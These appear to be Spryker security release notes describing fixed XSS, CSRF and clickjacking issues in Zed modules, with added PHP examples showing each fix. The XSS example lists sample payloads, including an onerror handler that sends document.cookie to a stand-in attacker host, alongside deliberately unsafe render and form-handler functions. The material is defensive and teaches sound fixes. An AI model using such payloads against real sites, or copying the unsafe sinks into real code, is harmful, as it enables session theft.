Security Release Notes 201903.0


The following information pertains to security-related issues that were discovered and resolved.

Issues are listed by description and affected modules.

If you need any additional support with this content, please contact

First, two of the potential vulnerabilities below can only be exploited by someone who already has direct access to Zed. It is therefore advised to always secure Zed: review which users have access to it and place it in a demilitarized zone of your infrastructure perimeter.

Possible Cross-Site Scripting (XSS)

An admin user could save raw HTML in product attributes, glossary entries and user role management in Zed, which is the precondition for stored cross-site scripting against other back-office users. Additional filtering of these inputs has been added.

Affected modules:

  • ProductAttribute (1.1.2)
  • ProductAttributeGui (1.2.1)
  • Glossary (3.5.2)
  • Acl (3.1.2)

How to get the fix: Just update modules with

composer update spryker/acl spryker/glossary spryker/product-attribute-gui spryker/product-attribute
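As an added illustration (not Spryker code; function and attribute names are invented for the example), here is a stored-XSS sink of the kind the affected forms had, next to the two layers that close it: filtering on the way into storage, which is what this release adds, and escaping on the way out.

```php
<?php
declare(strict_types=1);

// Added example, not Spryker code. Models an admin form that stores a product
// attribute value and a back-office page that renders it.

// Before: the value an admin typed is stored verbatim and echoed into the
// attribute table unescaped. Any other back-office user who opens that page
// runs the attacker's script in their session.
function renderAttributeCellUnsafe(string $storedValue): string
{
    return '<td>' . $storedValue . '</td>';
}

// Layer 1, input filtering: markup is removed before the value is persisted.
// An entity-encoded payload such as "&lt;script&gt;" is decoded first so it
// cannot survive as a second encoding layer and be decoded later by a template.
function filterAttributeInput(string $raw): string
{
    $decoded = html_entity_decode($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return trim(strip_tags($decoded));
}

// Layer 2, output encoding for the HTML text context. This is what actually
// prevents script execution if a filter bypass, or an older unfiltered row,
// is already sitting in the database.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderAttributeCell(string $storedValue): string
{
    return '<td>' . escapeHtml($storedValue) . '</td>';
}

// Constructed payloads an admin might submit (sample input for this example).
$payloads = [
    'Red <script>alert(document.cookie)</script>',
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    '&lt;svg onload=alert(1)&gt;',
];

foreach ($payloads as $raw) {
    $stored = filterAttributeInput($raw);
    echo "raw:      {$raw}\n";
    echo "unsafe:   " . renderAttributeCellUnsafe($raw) . "\n";
    echo "stored:   {$stored}\n";
    echo "rendered: " . renderAttributeCell($stored) . "\n\n";
}
```

Two caveats a practitioner should keep in mind. Input filtering with strip_tags is lossy (an attribute value like "5 < 6 cm" loses everything after the `<`), and it does not protect values that are rendered into a JavaScript or attribute context, so output escaping for the right context stays mandatory. Filtering on input also does nothing for rows that were saved before the update; audit existing attribute, glossary and role data for markup after upgrading.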

Possible Cross-Site Request Forgery (CSRF)

Product attribute forms were missing CSRF form tokens.

Affected module:

  • ProductAttributeGui (1.1.0)

How to get the fix: Just update modules with

composer update spryker/product-attribute-gui
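As an added example (not Spryker code; the form id, field names and handler are invented), the synchronizer-token pattern that a form like the product attribute edit form needs. The `$session` array stands in for the server-side session store.

```php
<?php
declare(strict_types=1);

// Added example, not Spryker code. Minimal synchronizer-token CSRF protection
// for a back-office form handler; $session models the server-side session.

// Issue one random token per form and keep it in the session. bin2hex keeps
// the value safe to embed in HTML and compare as a string.
function issueCsrfToken(array &$session, string $formId): string
{
    if (!isset($session['csrf'][$formId])) {
        $session['csrf'][$formId] = bin2hex(random_bytes(32));
    }
    return $session['csrf'][$formId];
}

// Hidden field rendered into the form. A page on another origin cannot read
// this value because the same-origin policy hides the response from it.
function renderHiddenTokenField(array &$session, string $formId): string
{
    $token = issueCsrfToken($session, $formId);
    return '<input type="hidden" name="_token" value="'
        . htmlspecialchars($token, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Before: nothing ties the POST to the admin's own session, so a foreign page
// can auto-submit the form and the browser attaches the admin's cookies.
function handleAttributeUpdateUnsafe(array $post): string
{
    return 'saved ' . $post['attribute_key'];
}

// After: the token from the request must match the one stored for this form.
// hash_equals avoids a timing side channel on the comparison.
function handleAttributeUpdate(array &$session, array $post, string $formId): string
{
    $expected = $session['csrf'][$formId] ?? null;
    $given = $post['_token'] ?? null;
    if ($expected === null || !is_string($given) || !hash_equals($expected, $given)) {
        return 'rejected: missing or invalid CSRF token';
    }
    return 'saved ' . $post['attribute_key'];
}

// Demo with constructed requests.
$session = [];
$formId = 'product_attribute_edit';
echo renderHiddenTokenField($session, $formId), "\n";
$token = $session['csrf'][$formId];

// Legitimate submission: carries the token that was rendered into the form.
echo handleAttributeUpdate($session, ['attribute_key' => 'color', '_token' => $token], $formId), "\n";
// Cross-site submission: the attacker never saw the token, so it is absent.
echo handleAttributeUpdate($session, ['attribute_key' => 'color'], $formId), "\n";
// Cross-site submission with a guessed token: rejected as well.
echo handleAttributeUpdate($session, ['attribute_key' => 'color', '_token' => str_repeat('0', 64)], $formId), "\n";
// The unprotected handler accepts all three.
echo handleAttributeUpdateUnsafe(['attribute_key' => 'color']), "\n";
```

The token only helps if the form is submitted with a state-changing method (POST) and the handler refuses GET for writes; a token checked on POST is bypassed if the same action is also reachable through a GET link.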

Potential Clickjacking

A Content-Security-Policy response header is now sent by default by the Application module. Clickjacking is prevented by the header's frame-ancestors directive, which restricts the origins that may embed Zed pages in a frame; after updating, verify that the policy your deployment sends actually carries that directive.

Affected module:

  • Application (3.14.0)

How to get the fix: Just update modules with

composer update spryker/application
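The following is an added example, not the Application module's own code: it shows the headers that stop foreign origins from framing a page and a check that can be run over the header block `curl -sI` returns from a deployed Zed. The policy value `frame-ancestors 'self'` and the function names are assumptions for the example, not what the module sets.

```php
<?php
declare(strict_types=1);

// Added example, not Spryker code. Anti-framing response headers plus a
// checker for captured response headers.

// Build the anti-framing headers. frame-ancestors is the CSP directive that
// governs embedding; a CSP without it does nothing against clickjacking.
function framingProtectionHeaders(string $frameAncestors = "'self'"): array
{
    $headers = ['Content-Security-Policy' => 'frame-ancestors ' . $frameAncestors];
    // X-Frame-Options is the fallback for browsers without frame-ancestors
    // support. It cannot express an origin list, so it is only emitted for
    // the two values it can represent.
    if ($frameAncestors === "'none'") {
        $headers['X-Frame-Options'] = 'DENY';
    } elseif ($frameAncestors === "'self'") {
        $headers['X-Frame-Options'] = 'SAMEORIGIN';
    }
    return $headers;
}

// Emit the headers from a web request (not called in the CLI demo below).
function sendFramingProtectionHeaders(): void
{
    foreach (framingProtectionHeaders() as $name => $value) {
        header($name . ': ' . $value);
    }
}

// Parse a raw HTTP response header block into name => [values].
function parseHeaderBlock(string $raw): array
{
    $headers = [];
    foreach (preg_split('/\r?\n/', trim($raw)) as $line) {
        if (strpos($line, ':') === false) {
            continue; // status line or blank line
        }
        [$name, $value] = explode(':', $line, 2);
        $headers[strtolower(trim($name))][] = trim($value);
    }
    return $headers;
}

// True if the response restricts framing. When a frame-ancestors directive is
// present, browsers that support it ignore X-Frame-Options, so the directive
// decides; a source list of '*' permits everyone. Only without the directive
// does X-Frame-Options DENY/SAMEORIGIN count. Report-Only headers are not
// looked at because they do not enforce anything.
function isFramingRestricted(string $rawHeaders): bool
{
    $h = parseHeaderBlock($rawHeaders);
    foreach ($h['content-security-policy'] ?? [] as $policy) {
        foreach (explode(';', $policy) as $directive) {
            $parts = preg_split('/\s+/', trim($directive));
            if (strtolower($parts[0]) === 'frame-ancestors') {
                $sources = array_slice($parts, 1);
                return !in_array('*', $sources, true);
            }
        }
    }
    foreach ($h['x-frame-options'] ?? [] as $xfo) {
        if (in_array(strtoupper(trim($xfo)), ['DENY', 'SAMEORIGIN'], true)) {
            return true;
        }
    }
    return false;
}

// Constructed header blocks standing in for curl -sI output.
$samples = [
    'fixed'                       => "HTTP/1.1 200 OK\r\nContent-Security-Policy: frame-ancestors 'self'\r\nX-Frame-Options: SAMEORIGIN\r\n",
    'csp without frame-ancestors' => "HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; script-src 'self'\r\n",
    'report-only'                 => "HTTP/1.1 200 OK\r\nContent-Security-Policy-Report-Only: frame-ancestors 'none'\r\n",
    'wildcard overrides xfo'      => "HTTP/1.1 200 OK\r\nContent-Security-Policy: frame-ancestors *\r\nX-Frame-Options: DENY\r\n",
];
foreach ($samples as $label => $raw) {
    printf("%-28s %s\n", $label, isFramingRestricted($raw) ? 'restricted' : 'NOT restricted');
}
```

The second and third samples are the cases worth checking on a real deployment: a CSP that is present but carries no frame-ancestors directive, and a policy delivered only as Report-Only, both leave the page frameable.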

Default Application Environment

This is not a security vulnerability, but to prevent a fatal misconfiguration the default value of APPLICATION_ENV, used when the variable is not provided by the system environment, has been set to production in the Install module. A host on which the variable is missing now falls back to production settings rather than to a non-production environment.

Affected module:

  • Install (0.5.1)